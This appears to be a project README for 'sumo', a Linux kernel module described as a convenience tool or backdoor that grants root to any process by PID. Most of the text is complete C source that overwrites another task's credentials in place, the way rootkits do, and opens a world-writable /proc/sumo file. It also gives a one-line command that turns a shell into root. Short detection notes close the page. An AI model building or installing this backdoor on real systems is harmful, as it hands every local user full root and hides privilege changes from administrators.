Sumo is a Linux kernel module that grants root credentials to any user-space process, selected by PID. Note that loading a module already requires root (CAP_SYS_MODULE), so sumo is a convenience tool or backdoor for a host you already control, not a privilege escalation on its own.
TL;DR
```sh
make                 # build
sudo insmod sumo.ko  # install
./whoami             # test
```
How it works
In its init() function, the sumo kernel module creates the /proc/sumo file and waits for a PID to be written to it. It then fetches the task_struct associated with that PID and modifies its values accordingly. The main point of interest is the data stored in the task's credentials structure (struct cred): the user and group IDs and the capability sets.
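The flow described above, written out as an added example; this is not sumo's own source, and the function names, the world-writable 0222 mode on /proc/sumo, the `proc_ops` interface (kernel 5.6 and later) and the in-place overwrite of the target's cred objects are my assumptions about how such a module is put together. The PID parser is plain C so that it compiles and can be exercised in user space; the kernel glue is compiled only when built as a module.

```c
/* Added example: a minimal "grant root by PID" module in the style of sumo.
 * Kernel-only parts live under #ifdef __KERNEL__; the parser builds anywhere. */
#ifdef __KERNEL__
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/proc_fs.h>
#include <linux/sched.h>
#include <linux/sched/task.h>
#include <linux/pid.h>
#include <linux/cred.h>
#include <linux/capability.h>
#include <linux/uidgid.h>
#include <linux/rcupdate.h>
#include <linux/uaccess.h>
#else
#include <stddef.h>
#include <stdio.h>
#endif

/* Parse the decimal PID written to the proc file ("1234\n" from echo).
 * Returns 0 and sets *pid_out on success, -1 on empty, non-numeric,
 * overflowing or zero input (PID 0 is never a valid target). */
static int sumo_parse_pid(const char *buf, size_t len, long *pid_out)
{
	long v = 0;
	size_t i = 0;

	for (; i < len && buf[i] >= '0' && buf[i] <= '9'; i++) {
		if (v > (2147483647L - (buf[i] - '0')) / 10)  /* would exceed INT_MAX */
			return -1;
		v = v * 10 + (buf[i] - '0');
	}
	if (i == 0)
		return -1;
	for (; i < len; i++)  /* only trailing whitespace/NUL is tolerated */
		if (buf[i] != '\n' && buf[i] != ' ' && buf[i] != '\0')
			return -1;
	if (v == 0)
		return -1;
	*pid_out = v;
	return 0;
}

/* Convenience wrapper for NUL-terminated input: PID, or -1 if rejected. */
static long sumo_pid_from_string(const char *s)
{
	size_t len = 0;
	long pid;

	while (s[len])
		len++;
	return sumo_parse_pid(s, len, &pid) ? -1 : pid;
}

#ifdef __KERNEL__
/* Overwrite one cred object in place. commit_creds() only applies to the
 * calling task, so changing someone else's identity means writing through
 * the const pointer the way rootkits do. Caveat: a cred object can be shared
 * (get_cred() holders, override_creds() users), so sharers are changed too. */
static void sumo_set_root(struct cred *cred)
{
	cred->uid = cred->euid = cred->suid = cred->fsuid = GLOBAL_ROOT_UID;
	cred->gid = cred->egid = cred->sgid = cred->fsgid = GLOBAL_ROOT_GID;
	cred->cap_inheritable = cred->cap_permitted = cred->cap_effective =
		cred->cap_bset = CAP_FULL_SET;
}

static void sumo_grant_root(struct task_struct *task)
{
	const struct cred *real, *eff;

	rcu_read_lock();
	real = rcu_dereference(task->real_cred);  /* objective credentials */
	eff = rcu_dereference(task->cred);        /* effective (subjective) ones */
	sumo_set_root((struct cred *)real);
	if (eff != real)
		sumo_set_root((struct cred *)eff);
	rcu_read_unlock();
}

static ssize_t sumo_write(struct file *file, const char __user *ubuf,
			  size_t len, loff_t *ppos)
{
	char kbuf[16];
	long pid;
	struct task_struct *task;

	if (len >= sizeof(kbuf))
		return -EINVAL;
	if (copy_from_user(kbuf, ubuf, len))
		return -EFAULT;
	if (sumo_parse_pid(kbuf, len, &pid))
		return -EINVAL;

	/* Resolve the PID in the writer's namespace and pin the task. */
	rcu_read_lock();
	task = pid_task(find_vpid((pid_t)pid), PIDTYPE_PID);
	if (task)
		get_task_struct(task);
	rcu_read_unlock();
	if (!task)
		return -ESRCH;

	sumo_grant_root(task);
	put_task_struct(task);
	return len;
}

static const struct proc_ops sumo_proc_ops = { .proc_write = sumo_write };

static int __init sumo_init(void)
{
	/* 0222: any user may write a PID, which is the whole point (assumed). */
	return proc_create("sumo", 0222, NULL, &sumo_proc_ops) ? 0 : -ENOMEM;
}

static void __exit sumo_exit(void)
{
	remove_proc_entry("sumo", NULL);
}

module_init(sumo_init);
module_exit(sumo_exit);
MODULE_LICENSE("GPL");
#else
int main(void)
{
	/* Constructed inputs mimicking what a user might echo into /proc/sumo. */
	const char *samples[] = { "1234", "0", "abc", "12x" };
	size_t i;

	for (i = 0; i < sizeof(samples) / sizeof(samples[0]); i++)
		printf("%-6s -> %ld\n", samples[i], sumo_pid_from_string(samples[i]));
	return 0;
}
#endif
```

With the module loaded, `echo $$ > /proc/sumo && id` turns the current shell into root without any setuid transition, which is also the detection angle: a uid change in a process that never issued setuid/setresuid, or the mere presence of /proc/sumo and a `sumo` entry in /proc/modules, is the artifact to look for. Kernels with module signature enforcement or lockdown enabled will refuse the insmod in the first place.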
sumo __ SUdo
,;.'--'. MOdule
/"/=,=(
\( __/
___/ (____
.' - - '.
/ v \
__/ , | \ '-/'_
{z, ,__/__,__/\__,_ )__( z}
\>' ( \_ `--c/
_.-'\_ , / \_
( `.______.' '.
\ , \ ( __ )
\ )-'-\__/-' | /
| | / .'
/ ,) ( \_
oooO' '--Ooo